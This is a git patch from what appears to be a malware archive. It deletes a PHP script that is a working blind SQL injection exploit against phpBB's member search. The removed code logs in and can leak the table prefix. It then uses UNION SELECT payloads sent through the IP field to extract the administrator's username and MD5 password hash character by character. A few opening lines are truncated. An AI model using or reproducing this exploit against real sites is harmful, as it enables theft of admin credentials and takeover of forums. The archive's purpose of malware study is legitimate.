From e92d16afa8ea6dcadd6f28af0d0d4c9a719e58e2 Mon Sep 17 00:00:00 2001
From: vxunderground <57078196+vxunderground@users.noreply.github.com>
Date: Fri, 30 Oct 2020 00:27:54 -0500
Subject: [PATCH] Delete Exploit.PHP.Inject.h na
---
 PHP/Exploit.PHP.Inject.h | 293 ---------------------------------------
 1 file changed, 293 deletions(-)
 delete mode 100644 PHP/Exploit.PHP.Inject.h
diff --git a/PHP/Exploit.PHP.Inject.h b/PHP/Exploit.PHP.Inject.h
deleted file mode 100644
index 8de1fdf5..00000000
--- a/PHP/Exploit.PHP.Inject.h
+++ /dev/null
@@ -1,293 +0,0 @@ -#!/usr/bin/php -q -d short_open_tag=on - 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -$host=$argv[1]; -$path=$argv[2]; -$user=$argv[3]; -$pass=$argv[4]; -$port=80; -$prefix="PHPBB_"; -$user_id="2";//admin -$discl=0; -$proxy=""; -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -if ($temp=="-T") -{ - $prefix=str_replace("-T","",$argv[$i]); -} -if ($temp=="-u") -{ - $user_id=str_replace("-u","",$argv[$i]); -} -if ($temp=="-x") -{ - $discl=1; -} -} - -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -$data="username=".urlencode($user); -$data.="&password=".urlencode($pass); -$data.="&redirect=index.php"; -$data.="&login=Login"; -$packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n"; -$packet.="Referer: http://$host$path/ucp.php?mode=login\r\n"; -$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; -$packet.="Accept-Encoding: text/plain\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); -$cookie=""; -$temp=explode("Set-Cookie: ",$html); -for ($i=1; $i<=count($temp)-1; $i++) -{ - $temp2=explode(" ",$temp[$i]); - $cookie.=" ".$temp2[0]; -} -if (eregi("_u=1;",$cookie)) -{ -//echo $html."\n";//debug -//die("Unable to login..."); -} -echo "cookie -> ".$cookie."\r\n"; -if ($discl) -{ -$sql="'suntzuuuuu"; -echo "sql -> ".$sql."\n"; -$sql=urlencode(strtoupper($sql)); -$data="username="; -$data.="&icq="; -$data.="&email="; -$data.="&aim="; -$data.="&joined_select=lt"; -$data.="&joined="; -$data.="&yahoo="; -$data.="&active_select=lt"; -$data.="&active="; -$data.="&msn="; -$data.="&count_select=eq"; -$data.="&count="; -$data.="&jabber="; -$data.="&sk=c"; -$data.="&sd=a"; -$data.="&ip=".$sql; -$data.="&search_group_id=0"; -$data.="&submit=Search"; -$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; -$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n"; -$packet.="Cookie: ".$cookie." 
\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); -if (strstr($html,"You have an error in your SQL syntax")) -{ -$temp=explode("posts",$html); -$temp2=explode(" ",$temp[0]); -$prefix=strtoupper($temp2[count($temp2)-1]); -echo "prefix -> ".$prefix."\n";sleep(2); -} -} - -$md5s[0]=0;//null -$md5s=array_merge($md5s,range(48,57)); //numbers -$md5s=array_merge($md5s,range(97,102));//a-f letters -//print_r(array_values($md5s)); -$j=1;$password=""; -while (!strstr($password,chr(0))) -{ -for ($i=0; $i<=255; $i++) -{ -if (in_array($i,$md5s)) -{ - $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; - echo "sql -> ".$sql."\n"; - $sql=urlencode(strtoupper($sql)); - $data="username="; - $data.="&icq="; - $data.="&email="; - $data.="&aim="; - $data.="&joined_select=lt"; - $data.="&joined="; - $data.="&yahoo="; - $data.="&active_select=lt"; - $data.="&active="; - $data.="&msn="; - $data.="&count_select=eq"; - $data.="&count="; - $data.="&jabber="; - $data.="&sk=c"; - $data.="&sd=a"; - $data.="&ip=".$sql; - $data.="&search_group_id=0"; - $data.="&submit=Search"; - $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; - $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Content-Length: ".strlen($data)."\r\n"; - $packet.="Connection: Close\r\n"; - $packet.="Cookie: ".$cookie." 
\r\n\r\n"; - $packet.=$data; - sendpacketii($packet); - if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;} - } - if ($i==255) {die("Exploit failed...");} -} -$j++; -} - -$j=1;$admin=""; -while (!strstr($admin,chr(0))) -{ -for ($i=0; $i<=255; $i++) -{ - $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; - echo "sql -> ".$sql."\n"; - $sql=urlencode(strtoupper($sql)); - $data="username="; - $data.="&icq="; - $data.="&email="; - $data.="&aim="; - $data.="&joined_select=lt"; - $data.="&joined="; - $data.="&yahoo="; - $data.="&active_select=lt"; - $data.="&active="; - $data.="&msn="; - $data.="&count_select=eq"; - $data.="&count="; - $data.="&jabber="; - $data.="&sk=c"; - $data.="&sd=a"; - $data.="&ip=".$sql; - $data.="&search_group_id=0"; - $data.="&submit=Search"; - $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; - $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Content-Length: ".strlen($data)."\r\n"; - $packet.="Connection: Close\r\n"; - $packet.="Cookie: ".$cookie." 
\r\n\r\n"; - $packet.=$data; - sendpacketii($packet); - if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;} - } - if ($i==255) {die("Exploit failed...");} -$j++; -} -echo "--------------------------------------------------------------------\r\n"; -echo "admin -> ".$admin."\r\n"; -echo "password (md5) -> ".$password."\r\n"; -echo "--------------------------------------------------------------------\r\n"; - -function is_hash($hash) -{ - if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} - else {return false;} -} - -if (is_hash($password)) {echo "Exploit succeeded...";} -else {echo "Exploit failed...";} -?> -